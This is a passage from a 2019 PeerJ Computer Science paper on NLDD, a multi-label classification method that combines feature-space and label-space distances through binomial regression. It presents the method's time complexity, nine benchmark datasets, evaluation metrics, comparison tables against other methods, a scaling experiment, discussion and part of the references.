the instance with the smallest distance in y. Note that mi1 and mi2 may be the same instance. If we find a single instance that minimizes both distances, we use just that instance. (A possible duplication of that instance is unlikely to make any difference in practice). Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 7/20 https://peerj.com https://doi.org/10.7717/peerjcs.242/fig-2 http://dx.doi.org/10.7717/peerj-cs.242 The two pairs corresponding to the ith instance in T2 are denoted as the set Si = { mi1,mi2 } , and their union for all instances is denoted as S= ⋃N/2 i=1 Si. The binomial regression specified in Eq. (2) is performed on the 2N2 =N instances in S. Algorithm 1 outlines the training procedure. For the classification of a new instance, we first obtain p̂ using the probabilistic classifiers fitted to the training data T . Dxj and Dyj are obtained by matching the instance with the jth training instance. Using the MLEs β̂0, β̂1 and β̂2, we calculate θ̂j = e f̂j 1+e f̂j where f̂j = β̂0+β̂1Dxj +β̂2Dyj . The final prediction of the new instance is obtained by ŷ=argmin yj∈T Ê(loss)=argmin yj∈T θ̂j. The second equality holds because Ê(loss)=Lθ̂ and L is a constant. As in LP, NLDD chooses a training labelset as the predicted vector. Algorithm 2 outlines the classification procedure. The training time of NLDD is O(L(f (d,N)+ f (d,N/2)+g(d,N/2))+N 2(d+L)+ Nlog(k)) where O(f (d,N)) is the complexity of each binary classifier with d features and N training instances, O(g(d,N/2)) is the complexity for predicting each label for T2, N 2(d+L) is the complexity for obtaining the distance pairs for the regression and O(Nlog(k)) is the complexity for fitting a binomial regression. T1 and T2 have N/2 instances respectively. O(Lf (d,N/2)) is the complexity for fitting binary classifiers using T1 and obtaining the probability results for T2 takes O(Lg(d,N/2)). For each instance of T2, we obtain N/2 numbers of distance pairs. This has complexity O((N/2)(d+L)). Since there are N/2 instances, overall it takes O((N/2)(N/2)(d+L)) or O(N 2(d+L)) when omitting the constant. Among the N/2 pairs for each instance of T2, we only identify at most 2 pairs. This implies N/2≤ s≤N where s is the number of elements in S. Each iteration of the Newton–Raphson method has a complexity of O(N). For k-digit precision complexity O(logk) is required (Ypma, 1995). Combined, the complexity for estimating the parameters with k-digit precision is O(Nlog(k)). In practice, however, this term is dominated by N 2(d+L) as we can set k <<N . EXPERIMENTAL EVALUATION In this section we compare different multi-label algorithms on nine data sets. We next introduce the data sets and the evaluation measures and then present the results of our experiments. Data sets We evaluated the proposed approach using nine commonly used multi-label data sets from different domains. Table 1 shows basic statistics for each data set including its domain, numbers of labels and features. In the text data sets, all features are categorical (i.e., binary). The last column ‘‘lcard’’, short for label cardinality, represents the average number of labels associated with an instance. The data sets are ordered by (|L|·|X|·|E|). The emotions data set (Trohidis et al., 2008) consists of pieces of music with rhythmic and timbre features. Each instance is associated with up to 6 emotion labels such as ‘‘sad-lonely’’, Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 8/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242 Table 1 Multi-label data sets and their associated characteristics. Label cardinality (lcards) is the aver- age number of labels associated with an instance. Name Domain Labels (|L|) Features (|X|) Examples (|E|) Lcards emotions music 6 72 593 1.87 scene image 6 294 2,407 1.07 yeast biology 14 103 2,417 4.24 medical text 45 1,449 978 1.25 slashdot text 22 1,079 3,782 1.18 enron text 53 1,001 1,702 3.37 ohsumed text 23 1,002 1,3929 1.66 tmc2007 text 22 500 2,8596 2.16 bibtex text 159 1,836 7,395 2.40 ‘‘amazed-surprised’’ and ‘‘happy-pleased’’. The scene data set (Boutell et al., 2004) consists of images with 294 visual features. Each image is associated with up to 6 labels including ‘‘mountain’’, ‘‘urban’’ and ‘‘beach’’. The yeast data set (Elisseeff & Weston, 2001) contains 2,417 yeast genes in the Yeast Saccharomyces Cerevisiae. Each gene is represented by 103 features and is associated with a subset of 14 functional labels. The medical data set consists of documents that describe patient symptom histories. The data were made available in the Medical Natural language Processing Challenge in 2007. Each document is associated with a set of 45 disease codes. The slashdot data set consists of 3,782 text instances with 22 labels obtained from Slashdot.org. The enron data set (Klimt & Yang, 2004) contains 1,702 email messages from the Enron corporation employees. The emails were categorized into 53 labels. The ohsumed data set (Hersh et al., 1994) is a collection of medical research articles from MEDLINE database. We used the same data set as in (Read et al., 2011) that contains 13,929 instances and 23 labels. The tmc2007 data set (Srivastava & Zane-Ulman, 2005) contains 28,596 aviation safety reports associated with up to 22 labels. Following Tsoumakas, Katakis & Vlahavas (2011), we used a reduced version of the data set with 500 features. The bibtex data set (Katakis, Tsoumakas & Vlahavas, 2008) consists of 7,395 bibtex entries for automated tag suggestion. The entries were classified into 159 labels. All data sets are available online at: MULAN (http://mulan.sourceforge.net/datasets-mlc.html) and MEKA (http://meka.sourceforge.net/#datasets). Evaluation metrics Multi-label classifiers can be evaluated with various loss functions. Here, four of the most popular criteria are used: Hamming loss, 0/1 loss, multi-label accuracy and F-measure. These criteria are defined in the following paragraphs. Let L be the number of labels in a multi-label problem. For a particular test instance, let y= (y(1),...,y(L)) be the labelset where y(j) =1 if the jth label is associated with the instance and 0 otherwise. Let ŷ= (ŷ(1),...,ŷ(L)) be the predicted values obtained by any machine learning method. Hamming loss refers to the percentage of incorrect labels. The Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 9/20 https://peerj.com http://mulan.sourceforge.net/datasets-mlc.html http://meka.sourceforge.net/#datasets http://dx.doi.org/10.7717/peerj-cs.242 Hamming loss for the instance is Hamming loss=1− 1 L L∑ j=1 1{y(j)= ŷ(j)} where 1 is the indicator function. Despite its simplicity, the Hamming loss may be less discriminative than other metrics. In practice, an instance is usually associated with a small subset of labels. As the elements of the L-dimensional label vector are mostly zero, even the empty set (i.e., zero vector) prediction may lead to a decent Hamming loss. The 0/1 loss is 0 if all predicted labels match the true labels and 1 otherwise. Hence, 0/1 loss=1−1{y= ŷ}. Compared to other evaluation metrics, 0/1 loss is strict as all the L labels must match to the true ones simultaneously. The multi-label accuracy (Godbole & Sarawagi, 2004) (also known as the Jaccard index) is defined as the number of labels counted in the intersection of the predicted and true labelsets divided by the number of labels counted in the union of the labelsets. That is, Multi-labelaccuracy = |y∩ŷ| |y∪ŷ| . The multi-label accuracy measures the similarity between the true and predicted labelsets. The F-measure is the harmonic mean of precision and recall. The F-measure is defined as F-measure= 2|y∩ŷ| |y|+|ŷ| . The metrics above were defined for a single instance. On each metric, the overall value for an entire test data set is obtained by averaging out the individual values. Experimental setup We compared our proposed method against BR, SMBR, ECC, RAKEL, HOMER, RF-PCT , MLKNN and CBM. To train multi-label classifiers, the parameters recommended by the authors were used, since they appear to give the best (or comparable to the best) performance in general. In the case of MLKNN , we set the number of neighbors and the smoothing parameter to 10 and 1 respectively. For RAKEL, we set the number of separate models to 2L and the size of each sub-labelset to 3. For ECC, the number of CC models for each ensemble was set to 10. For HOMER, the number of clusters was set to 3 as used in Liu et al. (2015). On the larger data sets (ohsumed, tmc2007 and bibtex), we fit ECC using reduced training data sets (75% of the instances and 50% of the features) as suggested in Read et al. (2011). On the same data sets, we ran NLDD using 70% of the training data to reduce redundancy in learning. For NLDD, we used support vector machines (SVM) (Vapnik, 2000) as the base classifier on unscaled variables with a linear kernel and tuning parameter C =1. The SVM scores were converted into probabilities using Platt’s method (Platt, 2000). The analysis was conducted in R (R Core Team, 2014) using the e1071 package (Meyer et al., 2014) for Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 10/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242 Table 2 Hamming loss (lower is better) averaged over 10 cross validations (with ranks in parentheses). The data sets are ordered as in Table 1. Data BR SMBR NLDD ECC RAKEL HOMER RF-PCT MLKNN CBM emotions 0.196 (4) 0.200 (5) 0.190 (2) 0.201 (6) 0.195 (3) 0.211 (7) 0.188 (1) 0.265 (8) 0.337 (9) scene 0.104 (7) 0.130 (9) 0.095 (5) 0.094 (4) 0.089 (2) 0.109 (8) 0.088 (1) 0.090 (3) 0.095 (6) yeast 0.199 (5) 0.205 (6) 0.190 (1) 0.206 (7) 0.196 (4) 0.254 (9) 0.192 (2) 0.195 (3) 0.213 (8) medical 0.010 (3) 0.011 (6) 0.010 (4) 0.009 (2) 0.010 (5) 0.014 (8) 0.012 (7) 0.015 (9) 0.009 (1) slashdot 0.047 (5) 0.054 (8) 0.045 (4) 0.047 (6) 0.044 (2) 0.055 (9) 0.044 (3) 0.052 (7) 0.044 (1) enron 0.058 (9) 0.056 (8) 0.055 (5) 0.052 (3) 0.055 (6) 0.055 (7) 0.046 (1) 0.053 (2) 0.053 (4) ohsumed 0.067 (5) 0.072 (7) 0.061 (3) 0.074 (8) 0.060 (2) 0.079 (9) 0.057 (1) 0.070 (6) 0.064 (4) tmc2007 0.058 (3) 0.059 (4) 0.058 (2) 0.063 (6) 0.059 (5) 0.065 (7) 0.053 (1) 0.071 (9) 0.070 (8) bibtex 0.016 (8) 0.015 (7) 0.013 (1) 0.015 (5) 0.015 (6) 0.021 (9) 0.014 (2) 0.014 (4) 0.014 (3) av. ranks 5.4 6.7 3.0 5.2 3.8 8.1 2.1 5.7 4.9 SVM. For the data sets with less than 5,000 instances 10-fold cross validations (CV ) were performed. On the larger data sets, we used 75/25 train/test splits. For fitting binomial regression models, we divided the training data sets at random into two parts of equal sizes. For RF-PCT , we used the Clus (http://clus.sourceforge.net) system. In the pre-pruning strategy of PCT , the significance level for the F-test was automatically chosen from {0.001, 0.005, 0.01, 0.05, 0.1, 0.125} using a reserved prune-set. For CBM, we used the authors’ Java program (https://github.com/cheng-li/pyramid). The default settings (e.g., logistic regression and 10 iterations for the EM algorithm) were used on non-large data sets. For the large data sets tmc2007 and bibtex, the number of iterations was set to 5 and random feature reduction was applied as suggested by the developers. On each data set we used the train/test split recommended at their website (https://github.com/cheng-li/pyramid). To test the hypothesis that all classifiers perform equally, we used the Friedman test as recommended by Demšar (2006). We then compared NLDD with each of the other methods using Wilcoxon signed-rank tests (Wilcoxon, 1945). We adjusted p-values for multiple testing using Hochberg’s method (Hochberg, 1988). In NLDD, when calculating distances in the feature spaces we used the standardized features so that no particular features dominated distances. For a numerical feature variable x, the standardized variable z is obtained by z =(x− x̄)/sd(x) where x̄ and sd(x) are the mean and standard deviation of x in the training data. Results Tables 2 to 5 summarize the results in terms of Hamming loss, 0/1 loss, multi-label accuracy and F-measure, respectively. We also ranked the algorithms for each metric. According to the Friedman tests, the classifiers are not all equal (p<0.05). The post-hoc analysis - adjusted for multiple testing - showed that NLDD performed significantly better than BR and SMBR on all metrics, significantly better than RAKEL and MLKNN on all but Hamming loss, significantly better than HOMER on Hamming loss and 0/1 loss, and significantly better than ECC and RF-PCT on 0/1 loss. No method performed statistically significantly better than NLDD on any evaluation metric. Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 11/20 https://peerj.com http://clus.sourceforge.net https://github.com/cheng-li/pyramid https://github.com/cheng-li/pyramid http://dx.doi.org/10.7717/peerj-cs.242 Table 3 0/1 loss (lower is better) averaged over 10 cross validations (with ranks in parentheses). The loss is 0 if a predicted labelset matches the true labelset exactly and 1 otherwise. Data BR SMBR NLDD ECC RAKEL HOMER RF- PCT MLKNN CBM emotions 0.718 (7) 0.708 (5) 0.690 (3) 0.710 (6) 0.679 (2) 0.695 (4) 0.662 (1) 0.885 (9) 0.798 (8) scene 0.467 (9) 0.424 (7) 0.319 (1) 0.351 (3) 0.364 (4) 0.377 (6) 0.436 (8) 0.370 (5) 0.321 (2) yeast 0.894 (8) 0.818 (6) 0.748 (1) 0.798 (3) 0.813 (4) 0.977 (9) 0.821 (7) 0.818 (5) 0.751 (2) medical 0.319 (6) 0.307 (4) 0.279 (2) 0.302 (3) 0.319 (5) 0.321 (7) 0.392 (8) 0.494 (7) 0.226 (1) slashdot 0.645 (7) 0.625 (5) 0.523 (2) 0.600 (4) 0.628 (6) 0.597 (3) 0.797 (8) 0.939 (9) 0.513 (1) enron 0.907 (8) 0.877 (4) 0.866 (2) 0.879 (5) 0.900 (6) 0.906 (7) 0.871 (3) 0.959 (9) 0.830 (1) ohsumed 0.799 (7) 0.787 (6) 0.720 (1) 0.820 (8) 0.774 (4) 0.776 (5) 0.768 (3) 0.949 (9) 0.734 (2) tmc2007 0.706 (5) 0.704 (4) 0.702 (2) 0.732 (7) 0.703 (3) 0.730 (6) 0.645 (1) 0.773 (9) 0.736 (8) bibtex 0.850 (6) 0.820 (3) 0.805 (2) 0.839 (4) 0.841 (5) 0.899 (7) 0.913 (8) 0.944 (9) 0.782 (1) av. ranks 6.9 4.9 1.8 4.8 4.3 6.0 5.2 8.1 2.9 Table 4 Multi- label accuracy (higher is better) averaged over 10 cross validations (with ranks in parentheses). Data BR SMBR NLDD ECC RAKEL HOMER RF- PCT MLKNN CBM emotions 0.525 (7) 0.547 (6) 0.562 (2) 0.559 (3) 0.555 (4) 0.579 (1) 0.552 (5) 0.325 (9) 0.403 (8) scene 0.636 (8) 0.651 (7) 0.742 (1) 0.699 (4) 0.699 (3) 0.692 (5) 0.587 (9) 0.690 (6) 0.718 (2) yeast 0.499 (8) 0.509 (7) 0.546 (1) 0.543 (2) 0.519 (4) 0.431 (9) 0.515 (5) 0.510 (6) 0.522 (3) medical 0.766 (6) 0.768 (5) 0.799 (2) 0.793 (3) 0.764 (7) 0.769 (4) 0.675 (8) 0.579 (9) 0.817 (1) slashdot 0.452 (7) 0.469 (5) 0.535 (2) 0.507 (3) 0.458 (6) 0.495 (4) 0.216 (8) 0.069 (9) 0.550 (1) enron 0.397 (8) 0.423 (5) 0.412 (6) 0.471 (1) 0.409 (7) 0.427 (4) 0.453 (2) 0.318 (9) 0.430 (3) ohsumed 0.385 (7) 0.397 (5) 0.435 (2) 0.432 (3) 0.394 (6) 0.422 (4) 0.341 (8) 0.080 (9) 0.492 (1) tmc2007 0.575 (3) 0.578 (2) 0.570 (6) 0.567 (7) 0.571 (5) 0.574 (4) 0.607 (1) 0.472 (9) 0.519 (8) bibtex 0.326 (6) 0.339 (3) 0.351 (2) 0.332 (5) 0.334 (4) 0.256 (7) 0.159 (8) 0.128 (9) 0.376 (1) av. ranks 6.7 5.0 2.7 3.4 5.1 4.7 6.0 8.3 3.1 Table 5 F-measure (higher is better) averaged over 10 cross validations (with ranks in parentheses). Data BR SMBR NLDD ECC RAKEL HOMER RF-PCT MLKNN CBM emotions 0.603 (7) 0.629 (5) 0.645 (3) 0.648 (2) 0.632 (4) 0.670 (1) 0.628 (6) 0.399 (9) 0.472 (8) scene 0.625 (8) 0.643 (7) 0.736 (1) 0.715 (4) 0.692 (5) 0.716 (3) 0.595 (9) 0.683 (6) 0.731 (2) yeast 0.609 (8) 0.616 (5) 0.644 (2) 0.647 (1) 0.625 (3) 0.562 (9) 0.622 (4) 0.614 (7) 0.615 (6) medical 0.795 (6) 0.796 (5) 0.827 (2) 0.826 (3) 0.793 (7) 0.801 (4) 0.697 (8) 0.603 (9) 0.831 (1) slashdot 0.503 (6) 0.516 (5) 0.562 (2) 0.561 (3) 0.502 (7) 0.528 (4) 0.220 (8) 0.073 (9) 0.567 (1) enron 0.512 (8) 0.530 (4) 0.520 (7) 0.585 (1) 0.522 (5) 0.546 (3) 0.562 (2) 0.426 (9) 0.522 (6) ohsumed 0.453 (7) 0.455 (6) 0.488 (4) 0.524 (1) 0.455 (5) 0.497 (2) 0.381 (8) 0.091 (9) 0.494 (3) tmc2007 0.666 (4) 0.670 (3) 0.662 (6) 0.664 (5) 0.660 (7) 0.672 (2) 0.688 (1) 0.556 (9) 0.601 (8) bibtex 0.397 (5) 0.393 (6) 0.411 (2) 0.406 (3) 0.402 (4) 0.323 (7) 0.190 (8) 0.160 (9) 0.437 (1) av. ranks 6.6 5.1 3.2 2.6 5.1 3.9 6.0 8.4 4.0 Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 12/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242 Table 6 Evaluation results on the bibtex data set by whether or not the labelset was observed (Subset A) or unobserved (Subset B) in the training data. Subset A contains 67% of the test instances and subset B contains 33%. For Hamming loss and 0/1 loss, lower is better. For Multi-label accuracy and F-measure, higher is better. Subset A Subset B Total (A∪B) BR NLDD BR NLDD BR NLDD Hamming loss 0.0113 0.0091 0.0250 0.0224 0.0158 0.0134 0/1 loss 0.7804 0.7163 0.9958 1.0000 0.8504 0.8084 Multi-label accuracy 0.3807 0.4273 0.2118 0.1870 0.3259 0.3492 F-measure 0.4402 0.4785 0.3065 0.3058 0.3966 0.4130 NLDD achieved lowest (i.e., best) average ranks on 0/1 loss and multi-label accuracy, while ECC and RF-PCT achieved the lowest average ranks on the F-measure and Hamming loss, respectively. On both F-measure and Hamming loss, NLDD achieved the second lowest (i.e., best) average ranks. CBM achieved the second lowest average rank on 0/1 loss and multi-label accuracy. The performance of CBM on the 0/1 loss was very variable achieving the lowest rank on five out of nine data sets and the second worst on two data sets. We next look at the performance of NLDD by whether or not the true labelsets were observed in the training data. A labelset has been observed if the exact labelset can be found in the training data and unobserved otherwise. Since NLDD makes a prediction by choosing a training labelset, a predicted labelset can only be partially correct on an unobserved labelset. Table 6 compares the evaluation results of BR and NLDD on two separate subsets of the test set of the bibtex data. The bibtex data were chosen because the data set contains by far the largest percentage of unobserved labelsets (33%) among the data sets investigated. The test data set was split into subsets A and B; if the labelset of a test instance was an observed labelset, the instance was assigned to A; otherwise the instance was assigned to B. For all of the four metrics, NLDD outperformed BR even though 33% of the labelsets in the test data were unobserved labelsets. We next look at the three regression parameters the proposed method (NLDD) estimated (Eq. (2)) for each data set in more detail. Table 7 displays the MLE of the parameters of the binomial model in each data set. In all data sets, the estimates of β1 and β2 were all positive. The positive slopes imply that the expected loss (or, equivalently the probability of misclassification for each label) decreases as Dx or Dy decreases. From the values of β̂0 we may infer how low the expected loss is when either Dx or Dy is 0. For example, β̂0 =−3.5023 in the scene data set. If Dx =0 and Dy =0, p̂=0.0292 because log p̂ 1−p̂ =−3.5023. Hence Ê(loss)=Lp̂=6·0.0292=0.1752. This is the expected number of mismatched labels for choosing a training labelset whose distances to the new instance are zero in both feature and label spaces. The results suggest the expected loss would be very small when classifying a new instance that had a duplicate in the training data (Dx=0) and whose labels are predicted with probability 1 and the predicted labelset was observed in the training data (Dy=0). Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 13/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242 Table 7 The maximum likelihood estimates of the parameters of equation (2) averaged over 10 cross validations. Data β̂0 β̂1 β̂2 emotions −2.6353 0.0321 1.0912 scene −3.5023 0.0134 1.8269 yeast −3.9053 0.1409 0.8546 medical −5.5296 0.1089 1.6933 slashdot −4.2503 0.1204 1.3925 enron −3.8827 0.0316 0.7755 bibtex −4.8436 0.0093 0.7264 ohsumed −3.1341 0.0022 0.9855 tmc2007 −3.6862 0.0370 1.1056 SCALING UP NLDD As seen in ‘Nearest labelset using double distances (NLDD)’, the time complexity of NLDD is dependent on the size of the training data (N). In particular, the term O(N 2(d+L)) makes the complexity of NLDD quadratic in N . For larger data sets the running time could be reduced by running the algorithm on a fraction of the N instances, but performance may be affected. This is investigated next. Figure 3 illustrates the running time and the corresponding performance of NLDD as a function of the percentage of N . For the result, we used the tmc2007 data with 75/25 train/test splits. After splitting, we randomly chose 10%–100% of the training data and ran NLDD with the reduced data. As before, we used SVM with a linear kernel as the base classifier. The result shows that NLDD can obtain similar predictive performances for considerably less time. The running time increased quadratically as a function of N while the improvement of the performance of NLDD appeared to converge. Using 60% of the training data, NLDD achieved almost the same performance in the number of mismatched labels as using the full training data. Similar results were obtained on other large data sets. DISCUSSION For the sample data sets selected, NLDD achieved the lowest (i.e., best) average ranks on 0/1 loss and multi-label accuracy, and the second lowest average ranks on Hamming loss and F-measure compared with other state-of-art methods. What may explain the success of NLDD? NLDD minimizes a function of two distances. NLDD performs substantially better than separate approaches that rely on only one of the distances: k-nearest neighbors (k=1) using Dx only or SMBR using Dy only (Supplemental Information). NLDD integrates the two distances using an additive model Eq. (2). The specific integration does not appear crucial: we have experimented with a multiplicative model, log ( θ 1−θ ) =β0+D β1 x D β2 y , that performed similarly (results not shown). Therefore the success seems due to the combination of two quite different distances. The distances may be complementary in that Dx corresponds to a highly local classifier (kNN with k=1) Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 14/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242#supplemental-information http://dx.doi.org/10.7717/peerj-cs.242#supplemental-information http://dx.doi.org/10.7717/peerj-cs.242 20 40 60 80 100 0 1 0 0 0 0 2 0 0 0 0 3 0 0 0 0 4 0 0 0 0 A Percentage of instance space (N) T im e ( se co n d s) 20 40 60 80 100 1 .3 5 1 .4 0 1 .4 5 1 .5 0 1 .5 5 B Percentage of instance space (N) N u m b e r o f m is cl a ss ifi e d la b e ls Figure 3 Running time (A) and the average number of mismatched labels (B) as a function of the percentage of the instance space for NLDD. Full-size DOI: 10.7717/peerjcs.242/fig-3 and Dy draws on a global classifier. Computing the distance Dy requires estimating the probability of each label using a base classifier. The classifier used here, SVM, is a general global classifier. Some evidence for the conjecture that a global base classifier is important are experiments using nearest neighbors (kNN) instead of SVM as a base classifier: a more global choice (k =30) yielded much improved results over a more local choice (k =3) (Supplemental Information). Like BR, NLDD uses outputs of independent binary classifiers. Using the distances in the feature and label spaces in binomial regression, NLDD can make more accurate predictions than BR. NLDD was also significantly superior to SMBR, which is similar to NLDD in the sense that it makes predictions by choosing training labelsets using binary classifiers. One of the reasons why NLDD performs better than BR and SMBR is that it contains extra parameters. SMBR is based on the label space only, while NLDD uses the distances in the feature space as well. Like LP, the proposed method predicts only labelsets observed in the training data. In restricting the labelsets for prediction, higher order correlations among the labels are implicitly accounted for. At the same time, this restriction is NLDD’s main limitation. If a new instance has a true labelset unobserved in the training data, there will be at least one incorrectly predicted label. Even so, NLDD scored best on two metrics and second best on two other metrics. How frequently an unobserved labelset occurs depends on the data set. For most data sets, less than 5% of the test data contained labelsets not observed in the training data. In other words, most of the labelsets of the test instances could be found in Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 15/20 https://peerj.com https://doi.org/10.7717/peerjcs.242/fig-3 http://dx.doi.org/10.7717/peerj-cs.242#supplemental-information http://dx.doi.org/10.7717/peerj-cs.242 the training data. However, for the bibtex data set about 33% of the test data contained unobserved labelsets. As seen in Table 6, when the true labelsets of the test instances were not observed in the training data (subset B), BR performed slightly better than NLDD in terms of 0/1 loss, multi-label accuracy and F-measure. On the other hand, when the true labelsets of the test instances were observed in the training data (subset A), NLDD outperformed BR on all of the metrics. Combined, NLDD achieved higher performances than BR on the entire test data. However, NLDD might not fare as well when the percentage of unobserved labelsets is substantially greater. The use of binomial regression (see equation Eq. (2)) implies that the misclassification probability θ is constant for each label. Although the true misclassification probabilities may differ for labels, the experimental results showed that NLDD performs well under this assumption. Instead of using binomial regression and estimating a single constant θ, one might have used L logistic regressions to estimate individual θi (i=1,...,L) for each label. Rather than choosing the labelset that minimizes a single θ, one could have then chosen the labelset that minimizes a function of the θi. However, choosing such a function is not straightforward. Also, this requires estimating 3L parameters instead of 3. NLDD uses binomial regression to estimate the parameters. This setup assumes that the instances in S are independent. While it turned out that this assumption worked well in practice, dependencies may arise between the two pairs of a given Si. If required this dependency could be modeled using, for example, generalized estimating equations (GEE) (Liang & Zeger, 1986). We examined GEE using an exchangeable correlation structure. The estimates were almost the same and the prediction results were unchanged. The analogous results are not shown. NLDD has higher time complexity than BR. The relative differences of running time between NLDD and BR depended on the size of the training data (N). The number of labels and features had less impact on the differences, as the complexity of NLDD is linear in them. For prediction, the minimization in Eq. (3) only requires the estimates of the coefficients β1 andβ2 which determine the tradeoff between Dx and Dy. The estimate ofβ0 is not needed. However, estimating β0 allows us to also estimate the probability of a misclassification of a label for an instance, θ̂. Such an assessment of uncertainty of the prediction can be useful. For example, one might only want to classify instances where the probability of misclassification is below a certain threshold value. NLDD uses a linear model for binomial regression specified in Eq. (2). To investigate how the performance of NLDD changes in nonlinear models, we also considered a model: log ( θ 1−θ ) =β0+D β1 x ·D β2 y in which the distances are combined in a multiplicative way. The difference of prediction results obtained by the linear and multiplicative models was small. While we used the Euclidean distance for NLDD, other distance metrics such as the Manhattan distance may also be employed. We ran NLDD based on the Manhattan distance in the label space and the results were almost the same: over 99% of the prediction were identical and the differences of the performance in all metrics were less than 1%(the Euclidean distance gave slightly better performance for most data). This shows that the Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 16/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242 difference in prediction performance between the Manhattan and the Euclidean metrics was tiny in practice. While SVM was employed as the base classifier, other algorithms could be chosen provided the classifier can estimate posterior probabilities rather than just scores. Better predictions of binary classifiers will make distances in the label space more useful and hence lead to a better performance. Lastly, we observed that the distributions of labels are, in general, unbalanced for many multi-label datasets. Since the performance of traditional classification algorithms can be limited on unbalanced data, addressing this problem could improve the reliability of the probabilistic classifiers, and result in an improved performance of NLDD. To mitigate the unbalanced distributions of labels, we applied Synthetic Minority Over-sampling Technique (SMOTE) (Chawla et al., 2002) that evens out the class distribution by generating synthetic examples of the minority class. Probabilistic classifiers were then trained on the expanded training data and used in the process of NLDD. For 7 out of the 9 data sets, the 0/1 loss, multi-label accuracy and F-measure were improved by a modest amount. CONCLUSION In this article, we have presented NLDD based on probabilistic binary classifiers. The proposed method chooses a training labelset with the minimum expected loss, where the expected loss is a function of two variables: the distances in feature and label spaces. The parameters are estimated by maximum likelihood. The experimental study with nine different multi-label data sets showed that NLDD outperformed other state-of-the-art methods on average in terms of 0/1 loss and multi-label accuracy. ADDITIONAL INFORMATION AND DECLARATIONS Funding This research was supported by National Science and Engineering Research Council of Canada and by Social Sciences and Humanities Research Council of Canada (SSHRC # 435-2013-0128). There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Science and Engineering Research Council of Canada. Social Sciences and Humanities Research Council of Canada: SSHRC # 435-2013-0128. Competing Interests The authors declare there are no competing interests. Author Contributions • Hyukjun Gweon conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 17/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242 tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Matthias Schonlau conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • Stefan H. Steiner conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Raw data is available at Github: https://github.com/hgweon/HG-multilabel. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.242#supplemental-information. REFERENCES Blockeel H, Raedt L, Ramon J. 1998. Top-down induction of clustering trees. In: Proceedings of the 15th international conference on machine learning. 55–63. Boutell MR, Luo J, Shen X, Brown CM. 2004. Learning multi-label scene classification. Pattern Recognition 37(9):1757–1771 DOI 10.1016/j.patcog.2004.03.009. Chawla NV, Bowyer KW, Hall LO, Kegelmeyer WP. 2002. SMOTE: synthetic minority over-sampling technique. Journal of Artificial Intelligence Research 16(1):321–357 DOI 10.1613/jair.953. Demšar J. 2006. Statistical comparisons of classifiers over multiple data sets. Journal of Machine Learning Research 7:1–30. Elisseeff A, Weston J. 2001. A kernel method for multi-labelled classification. In: Ad- vances in neural information processing systems 14. Cambridge: MIT Press, 681–687. Godbole S, Sarawagi S. 2004. Discriminative methods for multi-labeled classification. In: Dai H, Srikant R, Zhang C, eds. Advances in knowledge discovery and data mining. Berlin, Heidelberg: Springer, 22–30 DOI 10.1007/978-3-540-24775-3_5. Gonçalves T, Quaresma P. 2003. A preliminary approach to the multilabel classification problem of portuguese juridical documents. In: Proceedings of the 11th Portuguese conference on artificial intelligence. Springer, 435–444 DOI 10.1007/978-3-540-24580-3_50. Hersh W, Buckley C, Leone TJ, Hickam D. 1994. OHSUMED: an interactive retrieval evaluation and new large test collection for research. In: Proceedings of the 17th an- nual international ACM-SIGIR conference on research and development in information retrieval. London, 192–201 DOI 10.1007/978-1-4471-2099-5_20. Hochberg Y. 1988. A sharper Bonferroni procedure for multiple tests of significance. Biometrika 75(4):800–802. Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 18/20 https://peerj.com https://github.com/hgweon/HG-multilabel http://dx.doi.org/10.7717/peerj-cs.242#supplemental-information http://dx.doi.org/10.7717/peerj-cs.242#supplemental-information http://dx.doi.org/10.1016/j.patcog.2004.03.009 http://dx.doi.org/10.1613/jair.953 http://dx.doi.org/10.1007/978-3-540-24775-3_5 http://dx.doi.org/10.1007/978-3-540-24580-3_50 http://dx.doi.org/10.1007/978-1-4471-2099-5_20 http://dx.doi.org/10.7717/peerj-cs.242 Ji S, Tang L, Yu S, Ye J. 2008. Extracting shared subspace for multi-label classification. In: Proceedings of the 14th ACM SIGKDD international conference on knowledge discovery and data mining. ACM, 381–389 DOI 10.1145/1401890.1401939. Katakis I, Tsoumakas G, Vlahavas I. 2008. Multilabel text classification for automated tag suggestion. In: Proceedings of the ECML/PKDD discovery challenge. Antwerp. Klimt B, Yang Y. 2004. The enron corpus: a new dataset for email classification research. In: Proceedings of the 15th European conference on machine learning. Pisa: Springer, 217–226 DOI 10.1007/978-3-540-30115-8_22. Kocev D, Vens C, Struyf J, Džeroski S. 2007. Ensembles of multi-objective decision trees. In: Proceedings of the 18th European conference on machine learning. 624–631. Li C, Wang B, Pavlu V, Aslam JA. 2016. Conditional Bernoulli mixtures for multi-label classification. In: Proceedings of the 33rd international conference on machine learning. New York, 2482–2491. Li T, 